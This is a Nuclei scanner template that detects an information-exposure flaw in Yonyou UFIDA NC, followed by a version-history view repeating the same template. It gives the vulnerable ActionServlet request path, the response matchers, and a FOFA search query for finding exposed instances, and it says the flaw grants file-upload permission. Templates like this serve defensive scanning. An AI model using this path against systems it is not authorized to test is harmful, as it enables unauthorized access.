nuclei-templates/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml

id: yonyou-nc-info-leak

info:
  name: Yonyou UFIDA NC - Information Exposure
  author: SleepingBag945
  severity: medium
  description: |
    After logging in and visiting the address where the information was leaked, you will have permission to upload files. Then just go back to the homepage and view the published content directly.
  reference:
    - https://mp.weixin.qq.com/s/Lu6Zd9LP3PQsb8uzTIcANQ
    - https://github.com/zhangzhenfeng/AnyScan/blob/master/AnyScanUI/AnyPoc/data/poc/bugscan/exp%EF%BC%8D2311.py
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="用友-UFIDA-NC
    product: ufida-nc
    vendor: yonyou
  tags: yonyou,nc,exposure

  classification:
    cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:*
http:
  - method: GET
    path:
      - "{{BaseURL}}/service/~iufo/com.ufida.web.action.ActionServlet?TableSelectedID&TreeSelectedID&action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "iufo/web/images/usericon.gif"
          - "/iufo/web/images/tree/tree_plus.gif"
        condition: and

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100ba808960df0e03550d2e5eda2a333ad6a26eaa3bd173d2b3ba85aec8f68d5324022100e76f70ee0cefdda44f1a51fa6b25e5a3c00881bc6ccadb6b7bc1f58af1c68889:922c64590222798bb761d5b6d8e72950
Update -Template 2023-09-15 14:29:07 +00:00			`id: yonyou-nc-info-leak`

			`info:`
			`name: Yonyou UFIDA NC - Information Exposure`
			`author: SleepingBag945`
			`severity: medium`
			`description: \|`
			`After logging in and visiting the address where the information was leaked, you will have permission to upload files. Then just go back to the homepage and view the published content directly.`
			`reference:`
			`- https://mp.weixin.qq.com/s/Lu6Zd9LP3PQsb8uzTIcANQ`
			`- https://github.com/zhangzhenfeng/AnyScan/blob/master/AnyScanUI/AnyPoc/data/poc/bugscan/exp%EF%BC%8D2311.py`
			`metadata:`
templateman update 2023-10-14 11:27:55 +00:00			`verified: true`
Update -Template 2023-09-15 14:29:07 +00:00			`max-request: 1`
			`fofa-query: app="用友-UFIDA-NC`
Add missing cpes Added missing cpes 2024-09-10 08:22:50 +00:00			`product: ufida-nc`
			`vendor: yonyou`
Update -Template 2023-09-15 14:29:07 +00:00			`tags: yonyou,nc,exposure`

Add missing cpes Added missing cpes 2024-09-10 08:22:50 +00:00			`classification:`
			`cpe: cpe:2.3:a:yonyou:ufida-nc::::::::`
Update -Template 2023-09-15 14:29:07 +00:00			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/service/~iufo/com.ufida.web.action.ActionServlet?TableSelectedID&TreeSelectedID&action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease"`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "iufo/web/images/usericon.gif"`
			`- "/iufo/web/images/tree/tree_plus.gif"`
			`condition: and`

			`- type: status`
			`status:`
templateman update 2023-10-14 11:27:55 +00:00			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4b0a00483046022100ba808960df0e03550d2e5eda2a333ad6a26eaa3bd173d2b3ba85aec8f68d5324022100e76f70ee0cefdda44f1a51fa6b25e5a3c00881bc6ccadb6b7bc1f58af1c68889:922c64590222798bb761d5b6d8e72950`